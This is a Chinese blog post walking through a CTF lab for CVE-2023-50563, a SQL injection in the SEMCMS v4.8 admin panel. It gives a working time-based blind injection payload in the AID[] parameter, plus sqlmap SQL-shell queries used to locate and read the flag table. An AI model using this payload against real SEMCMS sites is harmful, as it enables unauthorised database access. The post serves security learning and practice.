【春秋云境】CVE-2023-50563 SEMCMS 后台SQL注入

最新推荐文章于 2024-05-08 10:43:08 发布
最新推荐文章于 2024-05-08 10:43:08 发布
阅读量185 收藏 2
点赞数 4
文章标签: 安全漏洞 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/137883815
版权

靶场介绍

SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入。

开启靶场

在这里插入图片描述

搜索POC

寻找漏洞点

在这里插入图片描述
下面看看要会员,共享自己的成果理应得到回报,至少他还给给我看了一点点
在这里插入图片描述
很明显是后台sql注入,因为存在管理入口,那就直接重装
在这里插入图片描述

重装完成后,可以看到登录入口
在这里插入图片描述

登录后台成功,挨个点功能,然后搜索他的参数:?Class=Shjia
因为这个参数比较特殊,不是什么英文,最后找到了才发现是上架的意思。
在这里插入图片描述

sql注入

随机点击一个商品上架,bp抓包
在这里插入图片描述

Payload:

languageID=1&AID[]=8) AND (SELECT 6149 FROM (SELECT(SLEEP(5)))pMLn) AND (1646=1646
在这里插入图片描述

获取flag

#sqlmap --sql-shell
# 先搜索flag在哪个表里,排序是因为已经知道是这个了
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM  information_schema.COLUMNS   WHERE COLUMN_NAME = 'flag' limit 2,1
#再搜索flag
select flag from flllaaaag

在这里插入图片描述

总结

1、开始以为是前台漏洞,通过靶场的提示也找到了这个路径,只是参数是ID,最后怎么测试都不行,浪费了时间。
在这里插入图片描述
2、看到资料可能是后台漏洞,就寻找后台。爆破后台也没有爆破出来,都是404
在这里插入图片描述
3、输入重装的数据库和用户名密码,总是提示错误,最后又重新想了想进入了后台,进入后台就快多了。

参考文献

1、https://blog.csdn.net/qq_41904294/article/details/135389792

HMX404
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SemCms外贸网站商城系统 SQL注入漏洞复现(CVE-2023-50563)
0xSec
01-04 1082
SemCms外贸网站商城系统4.8版本SEMCMS_Function.php 中的 AID 参数存在SQL注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库权限,深入利用可获取服务器权限
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋云境CVE-2023-1313
m0_64432806的博客
03-27 480
春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 996
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2340
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境CVE-2022-24223
一只爱吃橙子的羊
12-02 1159
AtomCMS SQL注入漏洞
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2173
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境CVE-2022-30887
ZXW_NUDT的博客
02-22 2541
春秋云境CVE-2022-30887
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
一键备份升级Openssh9.5p1 解决CVE-2023-38408,具体步骤见
SQL-索引篇整理
m0_59925573的博客
05-03 1466
聚簇索引就是按照每张表的主键构造一颗B+树,同时叶子节点中存放的就是整张表的行记录数据,也将聚集索引的叶子节点称为数据页。索引需要额外的磁盘空间,并降低写操作的性能。3.使用短索引,如果对长字符串列进行索引,应该指定一个前缀长度,这样能够节省大量索引空间,如果搜索词超过索引前缀长度,则使用索引排除不匹配的行,然后检查其余行是否可能匹配。红黑树,1.每个节点都是红or黑 2.根节点是黑 3.每个叶子节点都是黑色 4.红色节点的父子节点都必须是黑的 5.从任一个节点到叶子节点的所有路径都包含相同的黑色结点。
3万字长文:SQL Server面试题和参考答案(持续更新)
linweidong的专栏
05-07 295
事务(Transaction) 是数据库操作的一个单元,它由一个或多个SQL语句组成,这些语句要么全部成功执行,要么全部不执行。事务是数据库维护数据一致性和完整性的关键机制。事务的ACID属性原子性(Atomicity):事务中的所有操作要么全部完成,要么全部不完成,不会结束在中间某个点。一致性(Consistency):事务必须使数据库从一个一致的状态转移到另一个一致的状态。隔离性(Isolation):并发执行的事务之间不会互相影响。持久性。
Hive SQL-DML-insert插入数据
最新发布
喻师傅的学习笔记
05-08 287
insert
常用SQL命令
wenxiaoba的博客
05-02 1717
常用SQL语句使用说明和示例
SQL-慢查询的定位及优化
m0_59925573的博客
05-03 772
设置慢查询阈值,即查询执行时间超过该阈值的SQL语句将被记录。确保MySQL实例已经启用了慢查询日志功能。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值